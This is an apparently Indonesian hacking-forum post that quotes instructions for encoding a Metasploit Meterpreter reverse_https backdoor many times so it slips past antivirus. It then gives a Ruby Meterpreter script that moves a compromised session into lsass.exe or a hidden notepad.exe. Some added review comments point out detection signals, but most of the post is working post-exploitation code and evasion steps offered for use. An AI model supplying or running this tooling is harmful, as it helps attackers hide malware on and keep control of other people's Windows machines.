10-21-2012, 08:17 PM
(10-19-2012, 08:33 AM)mahong Wrote: oke langsung aj. di pagi yang sebohay ini saya akan melakukan enkripsi backdoors dengan menggunakan metasploit framework di Backtrack 5! bener nggak bang?
Pertama, install ni:
" apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils "
jalanin metasploit framework console, gunakan exploit/multi/handler method, dan set payload windows/meterpreter/reverse_https. Ini merupakan langkah untuk menggunakan script ‘launch_and_migrate.rb’, jadi kita bisa pindah ke proses berikutnya setelah kita dapat peluang. Kita encoded backdoornya 1000 kali sampai tidak stabil.
untuk scriptnya bisa PM ke saya dengan mencantumkan email anda..
semoga dapat membantu...
thxs...
Code:
# $Id$
#
# Simple example script that migrates to a specific process by name.
# This is meant as an illustration.
#
# Option state read by the migration logic later in the script.
spawn = false   # becomes true when -f is given
target = nil    # process name supplied as a non-switch argument (last one wins)

opts = Rex::Parser::Arguments.new(
  "-h" => [ false,"Help menu." ],
  "-f" => [ false, "Launch a process and migrate into the new process"]
)

# Walk the script arguments. Anything that is neither -f nor -h is stored as
# the target process name.
# NOTE(review): presumably the parser yields bare arguments with a nil opt --
# confirm against Rex::Parser::Arguments.
opts.parse(args) do |opt, idx, val|
  if opt == "-f"
    spawn = true
  elsif opt == "-h"
    # Print usage and stop the script without doing anything else.
    print_line("")
    print_line("USAGE: run migrate [process name]")
    print_line("EXAMPLE: run migrate explorer.exe")
    print_line(opts.usage)
    raise Rex::Script::Completed
  else
    target = val
  end
end
# Only Windows sessions are handled; any other platform ends the script here.
unless client.platform =~ /win32|win64/
  print_error("This version of Meterpreter is not supported with this Script!")
  raise Rex::Script::Completed
end

# Report the process that currently hosts the session.
server = client.sys.process.open
print_status("Current server process: #{server.name} (#{server.pid})")

target_pid = nil
if spawn
  # -f was given: start a new host process (notepad.exe unless a name was passed).
  # NOTE(review): the process is created with 'Hidden' => true, so a windowless
  # notepad.exe with an unusual parent process is a useful detection signal.
  target ||= "notepad.exe"
  print_status("Spawning a #{target} host process...")
  spawned = client.sys.process.execute(target, nil, {'Hidden' => true })
  target_pid = spawned.pid
  unless target_pid
    print_error("Could not create a process around #{target}")
    raise Rex::Script::Completed
  end
else
  # No -f: look up an already-running process by name, defaulting to lsass.exe.
  # NOTE(review): lsass.exe is a credential-holding system process; cross-process
  # access and remote thread creation into it are high-signal events for
  # endpoint monitoring (e.g. Sysmon process-access / remote-thread events).
  target ||= "lsass.exe"
  print_status("Migrating to #{target}...")
  target_pid = client.sys.process[target]
  unless target_pid
    # Lookup failed: fall back to a hidden notepad.exe. Its pid is not checked here.
    print_error("Could not access the target process")
    print_status("Spawning a notepad.exe host process...")
    fallback = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true })
    target_pid = fallback.pid
  end
end

# Move the session into the chosen process, then report the new host process.
print_status("Migrating into process ID #{target_pid}")
client.core.migrate(target_pid)
server = client.sys.process.open
print_status("New server process: #{server.name} (#{server.pid})")
SENJA INI